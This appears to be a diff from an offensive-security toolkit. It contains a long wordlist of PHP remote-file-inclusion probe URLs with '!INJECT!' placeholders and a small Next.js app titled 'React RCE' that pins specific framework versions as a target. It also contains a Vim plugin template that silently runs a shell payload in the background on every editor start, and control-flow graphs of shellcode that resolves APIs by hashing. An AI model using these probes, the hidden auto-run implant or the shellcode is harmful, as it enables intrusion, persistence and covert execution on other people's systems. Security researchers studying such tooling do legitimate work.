/web/lom.php?ETCDIR=!INJECT!
/web/network_module_selector.php?path_prefix=!INJECT!
/web/submit_abuse.php?path_prefix=!INJECT!
/web/submit_comment.php?path_prefix=!INJECT!
/webavis/class/class.php?root=!INJECT!?
/webmail/includes/mailaccess/pop3/core.php?CONFIG[pear_dir]=!INJECT!
/webnews/template.php?content_page=!INJECT!?
/webroot/css.php?CONFIGS=!INJECT!
/webyep-system/program/lib/WYURL.php?webyep_sIncludePath=!INJECT!
/webyep-system/programm/webyep.php?webyep_sIncludePath=!INJECT!?
/window.php?action=!INJECT!
/wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=!INJECT!?
/work/index.php?g_include=!INJECT!
/work/module/forum/forum.php?g_include=!INJECT!
/worldpay_notify.php?mosConfig_absolute_path=!INJECT!
/wp-cache-phase1.php?plugin=!INJECT!
/wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=!INJECT!
/wp-content/plugins/myflash/myflash-button.php?wpPATH=!INJECT!
/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=!INJECT!
/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=!INJECT!
/wp-content/plugins/wp-table/js/wptable-button.phpp?wpPATH=!INJECT!?
/wsk/wsk.php?wsk=!INJECT!
/xarg_corner.php?xarg=!INJECT!?
/xarg_corner_bottom.php?xarg=!INJECT!?
/xarg_corner_top.php?xarg=!INJECT!?
/xoopsgallery/init_basic.php?GALLERY_BASEDIR=!INJECT!?&2093085906=1&995617320=2
/xt_counter.php?server_base_dir=!INJECT!
/yabbse/Sources/Packages.php?sourcedir=!INJECT!
/yacs/scripts/update_trailer.php?context[path_to_root]=!INJECT!?
/yrch/plugins/metasearch/plug.inc.php?path=!INJECT!
/ytb/cuenta/cuerpo.php?base_archivo=!INJECT!
/zipndownload.php?PP_PATH=!INJECT!?
/zoomstats/libs/dbmax/mysql.php?GLOBALS['lib']['db']['path']=!INJECT!?
@@ -0,0 +1,14 @@
FROM node:18-alpine
WORKDIR /app
COPY package.json ./
RUN npm install
COPY . .
RUN npm run build
EXPOSE 3000
CMD ["npm", "start"]
@@ -0,0 +1,12 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<title>React RCE</title>
</head>
<body>
<div id="root"></div>
<script type="module" src="/src/main.jsx"></script>
</body>
</html>
@@ -0,0 +1,6 @@
/** @type {import('next').NextConfig} */
const nextConfig = {
output: 'standalone',
}
module.exports = nextConfig
@@ -0,0 +1,22 @@
{
"name": "my-next-app",
"version": "0.1.0",
"private": true,
"scripts": {
"dev": "next dev",
"build": "next build",
"start": "next start",
"lint": "next lint"
},
"dependencies": {
"react": "19.0.0",
"react-dom": "19.0.0",
"next": "15.0.4"
},
"devDependencies": {
"typescript": "^5",
"@types/node": "^20",
"@types/react": "^18",
"@types/react-dom": "^18"
}
}
@@ -0,0 +1,5 @@
"use server";
export async function greet(name: string) {
return `Hello, ${name}!`;
}
@@ -0,0 +1,11 @@
export default function RootLayout({
children,
}: {
children: React.ReactNode
}) {
return (
<html lang="ru">
<body>{children}</body>
</html>
);
}
@@ -0,0 +1,11 @@
import { greet } from './actions';
export default async function Home() {
const greeting = await greet("World");
return (
<main style={{ padding: '2rem', fontFamily: 'system-ui' }}>
<h1>{greeting}</h1>
</main>
);
}
@@ -0,0 +1,26 @@
{
"compilerOptions": {
"lib": ["dom", "dom.iterable", "esnext"],
"allowJs": true,
"skipLibCheck": true,
"strict": true,
"noEmit": true,
"esModuleInterop": true,
"module": "esnext",
"moduleResolution": "bundler",
"resolveJsonModule": true,
"isolatedModules": true,
"jsx": "preserve",
"incremental": true,
"plugins": [
{
"name": "next"
}
],
"paths": {
"@/*": ["./src/*"]
}
},
"include": ["next-env.d.ts", "**/*.ts", "**/*.tsx", ".next/types/**/*.ts"],
"exclude": ["node_modules"]
}
@@ -0,0 +1,6 @@
import { defineConfig } from "vite";
import react from "@vitejs/plugin-react";
export default defineConfig({
plugins: [react()],
});
+11
View File
@@ -0,0 +1,11 @@
" NAME.vim - Runs in the background on startup, discards output
if !has('job') || exists('g:loaded_ZZWcUtfrDa')
finish
endif
let g:loaded_NAME = 1
augroup NAME
autocmd!
autocmd VimEnter * silent! call job_start(["/bin/sh", "-c", "PAYLOAD_PLACEHOLDER"], {'out_io': 'null', 'err_io': 'null'})
augroup END
+157 -164
View File
@@ -90,350 +90,343 @@
<node id="block.0x1017:instruction.0x101b">
<data key="address">0x101b</data>
<data key="type">instruction</data>
<data key="instruction.hex">480fb74a4a</data>
<data key="instruction.source">movzx rcx, word ptr [rdx + 0x4a]</data>
<data key="instruction.hex">480fb74a48</data>
<data key="instruction.source">movzx rcx, word ptr [rdx + 0x48]</data>
</node>
<node id="block.0x1017:instruction.0x1020">
<data key="address">0x1020</data>
<data key="type">instruction</data>
<data key="instruction.hex">4d31c9</data>
<data key="instruction.source">xor r9, r9</data>
<data key="instruction.hex">41b900000000</data>
<data key="instruction.source">mov r9d, 0</data>
</node>
</graph>
</node>
<node id="block.0x1023">
<data key="address">0x1023</data>
<node id="block.0x1026">
<data key="address">0x1026</data>
<data key="type">block</data>
<graph edgedefault="directed">
<data key="address">0x1023</data>
<data key="address">0x1026</data>
<data key="type">block</data>
<node id="block.0x1023:instruction.0x1023">
<data key="address">0x1023</data>
<node id="block.0x1026:instruction.0x1026">
<data key="address">0x1026</data>
<data key="type">instruction</data>
<data key="instruction.hex">4831c0</data>
<data key="instruction.source">xor rax, rax</data>
</node>
<node id="block.0x1023:instruction.0x1026">
<data key="address">0x1026</data>
<node id="block.0x1026:instruction.0x1029">
<data key="address">0x1029</data>
<data key="type">instruction</data>
<data key="instruction.hex">ac</data>
<data key="instruction.source">lodsb al, byte ptr [rsi]</data>
</node>
<node id="block.0x1023:instruction.0x1027">
<data key="address">0x1027</data>
<node id="block.0x1026:instruction.0x102a">
<data key="address">0x102a</data>
<data key="type">instruction</data>
<data key="instruction.hex">3c61</data>
<data key="instruction.source">cmp al, 0x61</data>
</node>
<node id="block.0x1023:instruction.0x1029">
<data key="address">0x1029</data>
<node id="block.0x1026:instruction.0x102c">
<data key="address">0x102c</data>
<data key="type">instruction</data>
<data key="instruction.hex">7c02</data>
<data key="instruction.source">jl 0x102d</data>
<data key="instruction.source">jl 0x1030</data>
</node>
<edge source="block.0x1023:instruction.0x1023" target="block.0x1023:instruction.0x1026"/>
<edge source="block.0x1023:instruction.0x1026" target="block.0x1023:instruction.0x1027"/>
<edge source="block.0x1023:instruction.0x1027" target="block.0x1023:instruction.0x1029"/>
<edge source="block.0x1026:instruction.0x1026" target="block.0x1026:instruction.0x1029"/>
<edge source="block.0x1026:instruction.0x1029" target="block.0x1026:instruction.0x102a"/>
<edge source="block.0x1026:instruction.0x102a" target="block.0x1026:instruction.0x102c"/>
</graph>
</node>
<node id="block.0x102b">
<data key="address">0x102b</data>
<node id="block.0x102e">
<data key="address">0x102e</data>
<data key="type">block</data>
<graph edgedefault="directed">
<data key="address">0x102b</data>
<data key="address">0x102e</data>
<data key="type">block</data>
<node id="block.0x102b:instruction.0x102b">
<data key="address">0x102b</data>
<node id="block.0x102e:instruction.0x102e">
<data key="address">0x102e</data>
<data key="type">instruction</data>
<data key="instruction.hex">2c20</data>
<data key="instruction.source">sub al, 0x20</data>
</node>
</graph>
</node>
<node id="block.0x102d">
<data key="address">0x102d</data>
<node id="block.0x1030">
<data key="address">0x1030</data>
<data key="type">block</data>
<graph edgedefault="directed">
<data key="address">0x102d</data>
<data key="address">0x1030</data>
<data key="type">block</data>
<node id="block.0x102d:instruction.0x102d">
<data key="address">0x102d</data>
<node id="block.0x1030:instruction.0x1030">
<data key="address">0x1030</data>
<data key="type">instruction</data>
<data key="instruction.hex">41c1c90d</data>
<data key="instruction.source">ror r9d, 0xd</data>
</node>
<node id="block.0x102d:instruction.0x1031">
<data key="address">0x1031</data>
<node id="block.0x1030:instruction.0x1034">
<data key="address">0x1034</data>
<data key="type">instruction</data>
<data key="instruction.hex">4101c1</data>
<data key="instruction.source">add r9d, eax</data>
</node>
<node id="block.0x102d:instruction.0x1034">
<data key="address">0x1034</data>
<node id="block.0x1030:instruction.0x1037">
<data key="address">0x1037</data>
<data key="type">instruction</data>
<data key="instruction.hex">e2ed</data>
<data key="instruction.source">loop 0x1023</data>
<data key="instruction.source">loop 0x1026</data>
</node>
<edge source="block.0x102d:instruction.0x102d" target="block.0x102d:instruction.0x1031"/>
<edge source="block.0x102d:instruction.0x1031" target="block.0x102d:instruction.0x1034"/>
<edge source="block.0x1030:instruction.0x1030" target="block.0x1030:instruction.0x1034"/>
<edge source="block.0x1030:instruction.0x1034" target="block.0x1030:instruction.0x1037"/>
</graph>
</node>
<node id="block.0x1036">
<data key="address">0x1036</data>
<node id="block.0x1039">
<data key="address">0x1039</data>
<data key="type">block</data>
<graph edgedefault="directed">
<data key="address">0x1036</data>
<data key="address">0x1039</data>
<data key="type">block</data>
<node id="block.0x1036:instruction.0x1036">
<data key="address">0x1036</data>
<node id="block.0x1039:instruction.0x1039">
<data key="address">0x1039</data>
<data key="type">instruction</data>
<data key="instruction.hex">52</data>
<data key="instruction.source">push rdx</data>
</node>
<node id="block.0x1036:instruction.0x1037">
<data key="address">0x1037</data>
<node id="block.0x1039:instruction.0x103a">
<data key="address">0x103a</data>
<data key="type">instruction</data>
<data key="instruction.hex">4151</data>
<data key="instruction.source">push r9</data>
</node>
<node id="block.0x1036:instruction.0x1039">
<data key="address">0x1039</data>
<node id="block.0x1039:instruction.0x103c">
<data key="address">0x103c</data>
<data key="type">instruction</data>
<data key="instruction.hex">488b5220</data>
<data key="instruction.source">mov rdx, qword ptr [rdx + 0x20]</data>
</node>
<node id="block.0x1036:instruction.0x103d">
<data key="address">0x103d</data>
<node id="block.0x1039:instruction.0x1040">
<data key="address">0x1040</data>
<data key="type">instruction</data>
<data key="instruction.hex">8b423c</data>
<data key="instruction.source">mov eax, dword ptr [rdx + 0x3c]</data>
</node>
<node id="block.0x1036:instruction.0x1040">
<data key="address">0x1040</data>
<node id="block.0x1039:instruction.0x1043">
<data key="address">0x1043</data>
<data key="type">instruction</data>
<data key="instruction.hex">4801d0</data>
<data key="instruction.source">add rax, rdx</data>
</node>
<node id="block.0x1036:instruction.0x1043">
<data key="address">0x1043</data>
<node id="block.0x1039:instruction.0x1046">
<data key="address">0x1046</data>
<data key="type">instruction</data>
<data key="instruction.hex">668178180b02</data>
<data key="instruction.source">cmp word ptr [rax + 0x18], 0x20b</data>
</node>
<node id="block.0x1036:instruction.0x1049">
<data key="address">0x1049</data>
<node id="block.0x1039:instruction.0x104c">
<data key="address">0x104c</data>
<data key="type">instruction</data>
<data key="instruction.hex">7572</data>
<data key="instruction.hex">756f</data>
<data key="instruction.source">jne 0x10bd</data>
</node>
<edge source="block.0x1036:instruction.0x1036" target="block.0x1036:instruction.0x1039"/>
<edge source="block.0x1036:instruction.0x1036" target="block.0x1036:instruction.0x1037"/>
<edge source="block.0x1036:instruction.0x1037" target="block.0x1036:instruction.0x1049"/>
<edge source="block.0x1036:instruction.0x1039" target="block.0x1036:instruction.0x103d"/>
<edge source="block.0x1036:instruction.0x1039" target="block.0x1036:instruction.0x1040"/>
<edge source="block.0x1036:instruction.0x103d" target="block.0x1036:instruction.0x1040"/>
<edge source="block.0x1036:instruction.0x1040" target="block.0x1036:instruction.0x1043"/>
<edge source="block.0x1036:instruction.0x1043" target="block.0x1036:instruction.0x1049"/>
<edge source="block.0x1039:instruction.0x1039" target="block.0x1039:instruction.0x103c"/>
<edge source="block.0x1039:instruction.0x1039" target="block.0x1039:instruction.0x103a"/>
<edge source="block.0x1039:instruction.0x103a" target="block.0x1039:instruction.0x104c"/>
<edge source="block.0x1039:instruction.0x103c" target="block.0x1039:instruction.0x1040"/>
<edge source="block.0x1039:instruction.0x103c" target="block.0x1039:instruction.0x1043"/>
<edge source="block.0x1039:instruction.0x1040" target="block.0x1039:instruction.0x1043"/>
<edge source="block.0x1039:instruction.0x1043" target="block.0x1039:instruction.0x1046"/>
<edge source="block.0x1039:instruction.0x1046" target="block.0x1039:instruction.0x104c"/>
</graph>
</node>
<node id="block.0x104b">
<data key="address">0x104b</data>
<node id="block.0x104e">
<data key="address">0x104e</data>
<data key="type">block</data>
<graph edgedefault="directed">
<data key="address">0x104b</data>
<data key="address">0x104e</data>
<data key="type">block</data>
<node id="block.0x104b:instruction.0x104b">
<data key="address">0x104b</data>
<node id="block.0x104e:instruction.0x104e">
<data key="address">0x104e</data>
<data key="type">instruction</data>
<data key="instruction.hex">8b8088000000</data>
<data key="instruction.source">mov eax, dword ptr [rax + 0x88]</data>
</node>
<node id="block.0x104b:instruction.0x1051">
<data key="address">0x1051</data>
<node id="block.0x104e:instruction.0x1054">
<data key="address">0x1054</data>
<data key="type">instruction</data>
<data key="instruction.hex">4885c0</data>
<data key="instruction.source">test rax, rax</data>
</node>
<node id="block.0x104b:instruction.0x1054">
<data key="address">0x1054</data>
<node id="block.0x104e:instruction.0x1057">
<data key="address">0x1057</data>
<data key="type">instruction</data>
<data key="instruction.hex">7467</data>
<data key="instruction.hex">7464</data>
<data key="instruction.source">je 0x10bd</data>
</node>
<edge source="block.0x104b:instruction.0x104b" target="block.0x104b:instruction.0x1051"/>
<edge source="block.0x104b:instruction.0x1051" target="block.0x104b:instruction.0x1054"/>
<edge source="block.0x104e:instruction.0x104e" target="block.0x104e:instruction.0x1054"/>
<edge source="block.0x104e:instruction.0x1054" target="block.0x104e:instruction.0x1057"/>
</graph>
</node>
<node id="block.0x1056">
<data key="address">0x1056</data>
<node id="block.0x1059">
<data key="address">0x1059</data>
<data key="type">block</data>
<graph edgedefault="directed">
<data key="address">0x1056</data>
<data key="address">0x1059</data>
<data key="type">block</data>
<node id="block.0x1056:instruction.0x1056">
<data key="address">0x1056</data>
<node id="block.0x1059:instruction.0x1059">
<data key="address">0x1059</data>
<data key="type">instruction</data>
<data key="instruction.hex">4801d0</data>
<data key="instruction.source">add rax, rdx</data>
</node>
<node id="block.0x1056:instruction.0x1059">
<data key="address">0x1059</data>
<node id="block.0x1059:instruction.0x105c">
<data key="address">0x105c</data>
<data key="type">instruction</data>
<data key="instruction.hex">50</data>
<data key="instruction.source">push rax</data>
</node>
<node id="block.0x1056:instruction.0x105a">
<data key="address">0x105a</data>
<node id="block.0x1059:instruction.0x105d">
<data key="address">0x105d</data>
<data key="type">instruction</data>
<data key="instruction.hex">8b4818</data>
<data key="instruction.source">mov ecx, dword ptr [rax + 0x18]</data>
</node>
<node id="block.0x1056:instruction.0x105d">
<data key="address">0x105d</data>
<node id="block.0x1059:instruction.0x1060">
<data key="address">0x1060</data>
<data key="type">instruction</data>
<data key="instruction.hex">448b4020</data>
<data key="instruction.source">mov r8d, dword ptr [rax + 0x20]</data>
</node>
<node id="block.0x1056:instruction.0x1061">
<data key="address">0x1061</data>
<node id="block.0x1059:instruction.0x1064">
<data key="address">0x1064</data>
<data key="type">instruction</data>
<data key="instruction.hex">4901d0</data>
<data key="instruction.source">add r8, rdx</data>
</node>
<edge source="block.0x1056:instruction.0x1056" target="block.0x1056:instruction.0x1059"/>
<edge source="block.0x1056:instruction.0x1056" target="block.0x1056:instruction.0x105a"/>
<edge source="block.0x1056:instruction.0x1056" target="block.0x1056:instruction.0x105d"/>
<edge source="block.0x1056:instruction.0x105d" target="block.0x1056:instruction.0x1061"/>
<edge source="block.0x1059:instruction.0x1059" target="block.0x1059:instruction.0x105c"/>
<edge source="block.0x1059:instruction.0x1059" target="block.0x1059:instruction.0x105d"/>
<edge source="block.0x1059:instruction.0x1059" target="block.0x1059:instruction.0x1060"/>
<edge source="block.0x1059:instruction.0x1060" target="block.0x1059:instruction.0x1064"/>
</graph>
</node>
<node id="block.0x1064">
<data key="address">0x1064</data>
<node id="block.0x1067">
<data key="address">0x1067</data>
<data key="type">block</data>
<graph edgedefault="directed">
<data key="address">0x1064</data>
<data key="address">0x1067</data>
<data key="type">block</data>
<node id="block.0x1064:instruction.0x1064">
<data key="address">0x1064</data>
<node id="block.0x1067:instruction.0x1067">
<data key="address">0x1067</data>
<data key="type">instruction</data>
<data key="instruction.hex">e356</data>
<data key="instruction.hex">e353</data>
<data key="instruction.source">jrcxz 0x10bc</data>
</node>
</graph>
</node>
<node id="block.0x1066">
<data key="address">0x1066</data>
<node id="block.0x1069">
<data key="address">0x1069</data>
<data key="type">block</data>
<graph edgedefault="directed">
<data key="address">0x1066</data>
<data key="address">0x1069</data>
<data key="type">block</data>
<node id="block.0x1066:instruction.0x1066">
<data key="address">0x1066</data>
<node id="block.0x1069:instruction.0x1069">
<data key="address">0x1069</data>
<data key="type">instruction</data>
<data key="instruction.hex">48ffc9</data>
<data key="instruction.source">dec rcx</data>
</node>
<node id="block.0x1066:instruction.0x1069">
<data key="address">0x1069</data>
<node id="block.0x1069:instruction.0x106c">
<data key="address">0x106c</data>
<data key="type">instruction</data>
<data key="instruction.hex">418b3488</data>
<data key="instruction.source">mov esi, dword ptr [r8 + rcx*4]</data>
</node>
<node id="block.0x1066:instruction.0x106d">
<data key="address">0x106d</data>
<node id="block.0x1069:instruction.0x1070">
<data key="address">0x1070</data>
<data key="type">instruction</data>
<data key="instruction.hex">4801d6</data>
<data key="instruction.source">add rsi, rdx</data>
</node>
<node id="block.0x1066:instruction.0x1070">
<data key="address">0x1070</data>
<node id="block.0x1069:instruction.0x1073">
<data key="address">0x1073</data>
<data key="type">instruction</data>
<data key="instruction.hex">4d31c9</data>
<data key="instruction.source">xor r9, r9</data>
<data key="instruction.hex">448b4c2408</data>
<data key="instruction.source">mov r9d, dword ptr [rsp + 8]</data>
</node>
<edge source="block.0x1066:instruction.0x1066" target="block.0x1066:instruction.0x106d"/>
<edge source="block.0x1066:instruction.0x1066" target="block.0x1066:instruction.0x1069"/>
<edge source="block.0x1066:instruction.0x1069" target="block.0x1066:instruction.0x106d"/>
<edge source="block.0x1069:instruction.0x1069" target="block.0x1069:instruction.0x1070"/>
<edge source="block.0x1069:instruction.0x1069" target="block.0x1069:instruction.0x106c"/>
<edge source="block.0x1069:instruction.0x106c" target="block.0x1069:instruction.0x1070"/>
</graph>
</node>
<node id="block.0x1073">
<data key="address">0x1073</data>
<node id="block.0x1078">
<data key="address">0x1078</data>
<data key="type">block</data>
<graph edgedefault="directed">
<data key="address">0x1073</data>
<data key="address">0x1078</data>
<data key="type">block</data>
<node id="block.0x1073:instruction.0x1073">
<data key="address">0x1073</data>
<node id="block.0x1078:instruction.0x1078">
<data key="address">0x1078</data>
<data key="type">instruction</data>
<data key="instruction.hex">4831c0</data>
<data key="instruction.source">xor rax, rax</data>
</node>
<node id="block.0x1073:instruction.0x1076">
<data key="address">0x1076</data>
<node id="block.0x1078:instruction.0x107b">
<data key="address">0x107b</data>
<data key="type">instruction</data>
<data key="instruction.hex">ac</data>
<data key="instruction.source">lodsb al, byte ptr [rsi]</data>
</node>
<node id="block.0x1073:instruction.0x1077">
<data key="address">0x1077</data>
<node id="block.0x1078:instruction.0x107c">
<data key="address">0x107c</data>
<data key="type">instruction</data>
<data key="instruction.hex">41c1c90d</data>
<data key="instruction.source">ror r9d, 0xd</data>
</node>
<node id="block.0x1073:instruction.0x107b">
<data key="address">0x107b</data>
<node id="block.0x1078:instruction.0x1080">
<data key="address">0x1080</data>
<data key="type">instruction</data>
<data key="instruction.hex">4101c1</data>
<data key="instruction.source">add r9d, eax</data>
</node>
<node id="block.0x1073:instruction.0x107e">
<data key="address">0x107e</data>
<node id="block.0x1078:instruction.0x1083">
<data key="address">0x1083</data>
<data key="type">instruction</data>
<data key="instruction.hex">38e0</data>
<data key="instruction.source">cmp al, ah</data>
</node>
<node id="block.0x1073:instruction.0x1080">
<data key="address">0x1080</data>
<node id="block.0x1078:instruction.0x1085">
<data key="address">0x1085</data>
<data key="type">instruction</data>
<data key="instruction.hex">75f1</data>
<data key="instruction.source">jne 0x1073</data>
<data key="instruction.source">jne 0x1078</data>
</node>
<edge source="block.0x1073:instruction.0x1073" target="block.0x1073:instruction.0x1076"/>
<edge source="block.0x1073:instruction.0x1073" target="block.0x1073:instruction.0x1077"/>
<edge source="block.0x1073:instruction.0x1073" target="block.0x1073:instruction.0x107e"/>
<edge source="block.0x1073:instruction.0x1076" target="block.0x1073:instruction.0x107b"/>
<edge source="block.0x1073:instruction.0x1076" target="block.0x1073:instruction.0x107e"/>
<edge source="block.0x1073:instruction.0x1077" target="block.0x1073:instruction.0x107b"/>
<edge source="block.0x1073:instruction.0x1077" target="block.0x1073:instruction.0x1080"/>
<edge source="block.0x1073:instruction.0x107b" target="block.0x1073:instruction.0x107e"/>
<edge source="block.0x1073:instruction.0x107e" target="block.0x1073:instruction.0x1080"/>
<edge source="block.0x1078:instruction.0x1078" target="block.0x1078:instruction.0x107b"/>
<edge source="block.0x1078:instruction.0x1078" target="block.0x1078:instruction.0x107c"/>
<edge source="block.0x1078:instruction.0x1078" target="block.0x1078:instruction.0x1083"/>
<edge source="block.0x1078:instruction.0x107b" target="block.0x1078:instruction.0x1080"/>
<edge source="block.0x1078:instruction.0x107b" target="block.0x1078:instruction.0x1083"/>
<edge source="block.0x1078:instruction.0x107c" target="block.0x1078:instruction.0x1080"/>
<edge source="block.0x1078:instruction.0x107c" target="block.0x1078:instruction.0x1085"/>
<edge source="block.0x1078:instruction.0x1080" target="block.0x1078:instruction.0x1083"/>
<edge source="block.0x1078:instruction.0x1083" target="block.0x1078:instruction.0x1085"/>
</graph>
</node>
<node id="block.0x1082">
<data key="address">0x1082</data>
<node id="block.0x1087">
<data key="address">0x1087</data>
<data key="type">block</data>
<graph edgedefault="directed">
<data key="address">0x1082</data>
<data key="address">0x1087</data>
<data key="type">block</data>
<node id="block.0x1082:instruction.0x1082">
<data key="address">0x1082</data>
<data key="type">instruction</data>
<data key="instruction.hex">4c034c2408</data>
<data key="instruction.source">add r9, qword ptr [rsp + 8]</data>
</node>
<node id="block.0x1082:instruction.0x1087">
<node id="block.0x1087:instruction.0x1087">
<data key="address">0x1087</data>
<data key="type">instruction</data>
<data key="instruction.hex">4539d1</data>
<data key="instruction.source">cmp r9d, r10d</data>
</node>
<node id="block.0x1082:instruction.0x108a">
<node id="block.0x1087:instruction.0x108a">
<data key="address">0x108a</data>
<data key="type">instruction</data>
<data key="instruction.hex">75d8</data>
<data key="instruction.source">jne 0x1064</data>
<data key="instruction.hex">75db</data>
<data key="instruction.source">jne 0x1067</data>
</node>
<edge source="block.0x1082:instruction.0x1082" target="block.0x1082:instruction.0x1087"/>
<edge source="block.0x1082:instruction.0x1087" target="block.0x1082:instruction.0x108a"/>
<edge source="block.0x1087:instruction.0x1087" target="block.0x1087:instruction.0x108a"/>
</graph>
</node>
<node id="block.0x108c">
@@ -640,17 +633,17 @@
</graph>
</node>
<edge source="block.0x1000" target="block.0x1017"/>
<edge source="block.0x1017" target="block.0x1023"/>
<edge source="block.0x1023" target="block.0x102b"/>
<edge source="block.0x102b" target="block.0x102d"/>
<edge source="block.0x102d" target="block.0x1036"/>
<edge source="block.0x1036" target="block.0x104b"/>
<edge source="block.0x104b" target="block.0x1056"/>
<edge source="block.0x1056" target="block.0x1064"/>
<edge source="block.0x1064" target="block.0x1066"/>
<edge source="block.0x1066" target="block.0x1073"/>
<edge source="block.0x1073" target="block.0x1082"/>
<edge source="block.0x1082" target="block.0x108c"/>
<edge source="block.0x1017" target="block.0x1026"/>
<edge source="block.0x1026" target="block.0x102e"/>
<edge source="block.0x102e" target="block.0x1030"/>
<edge source="block.0x1030" target="block.0x1039"/>
<edge source="block.0x1039" target="block.0x104e"/>
<edge source="block.0x104e" target="block.0x1059"/>
<edge source="block.0x1059" target="block.0x1067"/>
<edge source="block.0x1067" target="block.0x1069"/>
<edge source="block.0x1069" target="block.0x1078"/>
<edge source="block.0x1078" target="block.0x1087"/>
<edge source="block.0x1087" target="block.0x108c"/>
<edge source="block.0x108c" target="block.0x10bc"/>
<edge source="block.0x10bc" target="block.0x10bd"/>
</graph>
+251 -258
View File
@@ -69,492 +69,471 @@
<node id="block.0x100f:instruction.0x1012">
<data key="address">0x1012</data>
<data key="type">instruction</data>
<data key="instruction.hex">0fb74a26</data>
<data key="instruction.source">movzx ecx, word ptr [edx + 0x26]</data>
<data key="instruction.hex">0fb74a24</data>
<data key="instruction.source">movzx ecx, word ptr [edx + 0x24]</data>
</node>
<node id="block.0x100f:instruction.0x1016">
<data key="address">0x1016</data>
<data key="type">instruction</data>
<data key="instruction.hex">31ff</data>
<data key="instruction.source">xor edi, edi</data>
<data key="instruction.hex">bf00000000</data>
<data key="instruction.source">mov edi, 0</data>
</node>
</graph>
</node>
<node id="block.0x1018">
<data key="address">0x1018</data>
<node id="block.0x101b">
<data key="address">0x101b</data>
<data key="type">block</data>
<graph edgedefault="directed">
<data key="address">0x1018</data>
<data key="address">0x101b</data>
<data key="type">block</data>
<node id="block.0x1018:instruction.0x1018">
<data key="address">0x1018</data>
<node id="block.0x101b:instruction.0x101b">
<data key="address">0x101b</data>
<data key="type">instruction</data>
<data key="instruction.hex">31c0</data>
<data key="instruction.source">xor eax, eax</data>
</node>
<node id="block.0x1018:instruction.0x101a">
<data key="address">0x101a</data>
<node id="block.0x101b:instruction.0x101d">
<data key="address">0x101d</data>
<data key="type">instruction</data>
<data key="instruction.hex">ac</data>
<data key="instruction.source">lodsb al, byte ptr [esi]</data>
</node>
<node id="block.0x1018:instruction.0x101b">
<data key="address">0x101b</data>
<node id="block.0x101b:instruction.0x101e">
<data key="address">0x101e</data>
<data key="type">instruction</data>
<data key="instruction.hex">3c61</data>
<data key="instruction.source">cmp al, 0x61</data>
</node>
<node id="block.0x1018:instruction.0x101d">
<data key="address">0x101d</data>
<node id="block.0x101b:instruction.0x1020">
<data key="address">0x1020</data>
<data key="type">instruction</data>
<data key="instruction.hex">7c02</data>
<data key="instruction.source">jl 0x1021</data>
<data key="instruction.source">jl 0x1024</data>
</node>
<edge source="block.0x1018:instruction.0x1018" target="block.0x1018:instruction.0x101a"/>
<edge source="block.0x1018:instruction.0x101a" target="block.0x1018:instruction.0x101b"/>
<edge source="block.0x1018:instruction.0x101b" target="block.0x1018:instruction.0x101d"/>
<edge source="block.0x101b:instruction.0x101b" target="block.0x101b:instruction.0x101d"/>
<edge source="block.0x101b:instruction.0x101d" target="block.0x101b:instruction.0x101e"/>
<edge source="block.0x101b:instruction.0x101e" target="block.0x101b:instruction.0x1020"/>
</graph>
</node>
<node id="block.0x101f">
<data key="address">0x101f</data>
<node id="block.0x1022">
<data key="address">0x1022</data>
<data key="type">block</data>
<graph edgedefault="directed">
<data key="address">0x101f</data>
<data key="address">0x1022</data>
<data key="type">block</data>
<node id="block.0x101f:instruction.0x101f">
<data key="address">0x101f</data>
<node id="block.0x1022:instruction.0x1022">
<data key="address">0x1022</data>
<data key="type">instruction</data>
<data key="instruction.hex">2c20</data>
<data key="instruction.source">sub al, 0x20</data>
</node>
</graph>
</node>
<node id="block.0x1021">
<data key="address">0x1021</data>
<node id="block.0x1024">
<data key="address">0x1024</data>
<data key="type">block</data>
<graph edgedefault="directed">
<data key="address">0x1021</data>
<data key="address">0x1024</data>
<data key="type">block</data>
<node id="block.0x1021:instruction.0x1021">
<data key="address">0x1021</data>
<node id="block.0x1024:instruction.0x1024">
<data key="address">0x1024</data>
<data key="type">instruction</data>
<data key="instruction.hex">c1cf0d</data>
<data key="instruction.source">ror edi, 0xd</data>
</node>
<node id="block.0x1021:instruction.0x1024">
<data key="address">0x1024</data>
<node id="block.0x1024:instruction.0x1027">
<data key="address">0x1027</data>
<data key="type">instruction</data>
<data key="instruction.hex">01c7</data>
<data key="instruction.source">add edi, eax</data>
</node>
<node id="block.0x1021:instruction.0x1026">
<data key="address">0x1026</data>
<node id="block.0x1024:instruction.0x1029">
<data key="address">0x1029</data>
<data key="type">instruction</data>
<data key="instruction.hex">49</data>
<data key="instruction.source">dec ecx</data>
</node>
<node id="block.0x1021:instruction.0x1027">
<data key="address">0x1027</data>
<node id="block.0x1024:instruction.0x102a">
<data key="address">0x102a</data>
<data key="type">instruction</data>
<data key="instruction.hex">75ef</data>
<data key="instruction.source">jne 0x1018</data>
<data key="instruction.source">jne 0x101b</data>
</node>
<edge source="block.0x1021:instruction.0x1021" target="block.0x1021:instruction.0x1024"/>
<edge source="block.0x1021:instruction.0x1024" target="block.0x1021:instruction.0x1026"/>
<edge source="block.0x1021:instruction.0x1026" target="block.0x1021:instruction.0x1027"/>
<edge source="block.0x1024:instruction.0x1024" target="block.0x1024:instruction.0x1027"/>
<edge source="block.0x1024:instruction.0x1027" target="block.0x1024:instruction.0x1029"/>
<edge source="block.0x1024:instruction.0x1029" target="block.0x1024:instruction.0x102a"/>
</graph>
</node>
<node id="block.0x1029">
<data key="address">0x1029</data>
<node id="block.0x102c">
<data key="address">0x102c</data>
<data key="type">block</data>
<graph edgedefault="directed">
<data key="address">0x1029</data>
<data key="address">0x102c</data>
<data key="type">block</data>
<node id="block.0x1029:instruction.0x1029">
<data key="address">0x1029</data>
<node id="block.0x102c:instruction.0x102c">
<data key="address">0x102c</data>
<data key="type">instruction</data>
<data key="instruction.hex">52</data>
<data key="instruction.source">push edx</data>
</node>
<node id="block.0x1029:instruction.0x102a">
<data key="address">0x102a</data>
<node id="block.0x102c:instruction.0x102d">
<data key="address">0x102d</data>
<data key="type">instruction</data>
<data key="instruction.hex">57</data>
<data key="instruction.source">push edi</data>
</node>
<node id="block.0x1029:instruction.0x102b">
<data key="address">0x102b</data>
<node id="block.0x102c:instruction.0x102e">
<data key="address">0x102e</data>
<data key="type">instruction</data>
<data key="instruction.hex">8b5210</data>
